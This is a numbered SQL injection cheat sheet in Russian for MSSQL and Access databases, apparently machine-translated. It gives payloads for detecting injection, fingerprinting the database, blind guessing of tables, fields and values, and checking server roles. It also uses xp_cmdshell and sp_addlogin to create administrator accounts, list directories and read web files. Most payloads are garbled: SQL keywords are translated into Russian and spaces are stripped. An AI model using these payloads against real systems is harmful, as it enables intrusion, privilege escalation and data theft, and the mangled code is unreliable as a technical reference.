1. Определите, есть ли инъекция
; и 1 = 1
; и 1 = 2
2. Предварительное суждение о том, является ли это MSSQL
; anduser> 0
3. Параметры инъекции - это символы
'и [условие запроса] и' '='
4. Нет параметров фильтрации во время поиска
'и [условие запроса] и'%25 '='
5. Джадж -база данных
; и (SelectCount (*) FromSysObjects)> 0msSQL
; и (selectCount (*) formmsysObjects)> 0 -access
6. Угадайте базу данных
; и (selectCount (*) из [имя базы данных])> 0
7. Угадайте поле
; и (SelectCount (имя поля) из имени базы данных)> 0
8. Угадайте длину записи в поле
; и (selectTop1len (имя поля) из имени базы данных)> 0
9. (1) Угадайте значение ASCII поля (доступ)
; и (selectTop1asc (mid (имя поля, 1, 1)) из имени базы данных)> 0
(2) Угадайте значение ASCII поля (MSSQL)
; и (selectTop1Unicode (substring (имя поля, 1, 1)) из имени базы данных)> 0
10. Структура разрешения тестирования (MSSQL)
; и1 = (SELECTIS_SRVROLEMEMPER ('sysadmin'));-
; и1 = (selectis_srvrolemember ('serveradmin'));-
; и1 = (SELECTIS_SRVROLEMEMPER ('Setupadmin'));-
; и1 = (SELECTIS_SRVROLEMEMPER ('SecurityAdmin'));-
; и1 = (selectis_srvrolemember ('diskadmin'));-
; и1 = (selectis_srvrolemember ('bulkadmin'));-
; и1 = (selectis_member ('db_owner'));-
11. Добавить MSSQL и системную учетную запись
; execmaster.dbo.sp_addloginusername;-
; execmaster.dbo.sp_passwordnull, имя пользователя, пароль;-
; execmaster.dbo.sp_addsrvrolemembersysAdminusername;-
; execmaster.dbo.xp_cmdshell'netuserusernamepassword/workstations:*/times: all/passwordchg: yes/passwordReq: Да/Актив: Да/Добавить ';--
; execmaster.dbo.xp_cmdshell'netuserusernamepassword/add ';-
; execmaster.dbo.xp_cmdshell'netlocalgroupadministratorsusername/add ';-
12. (1) Передача каталога
; CreateTabledIrs (Pathsvarchar (100), Idint)
; insertDirsexeCmaster.dbo.xp_dirtree'c:/'
; и (selectTop1pathsfromDirs)> 0
; и (selecttop1pathsfromdirswherepathsnotin ('пути, полученные с предыдущего шага'))>)
(2) Переезд в каталог
; CreateTableTemp (Idnvarchar (255), num1nvarchar (255), num2nvarchar (255), num3nvarchar (255));-
; inserttempexecmaster.dbo.xp_availablemedia;-получить все текущие диски
; insertIntoTemp (id) execmaster.dbo.xp_subdirs'c:/';-Получить список подкаталог
; insertIntoTemp (id, num1) execmaster.dbo.xp_dirtree'c:/';-Получите структуру дерева каталогов всех подкаталос.
; insertIntoTemp (id) execmaster.dbo.xp_cmdshell'typec: /web/index.asp ';-Просмотреть содержимое файла
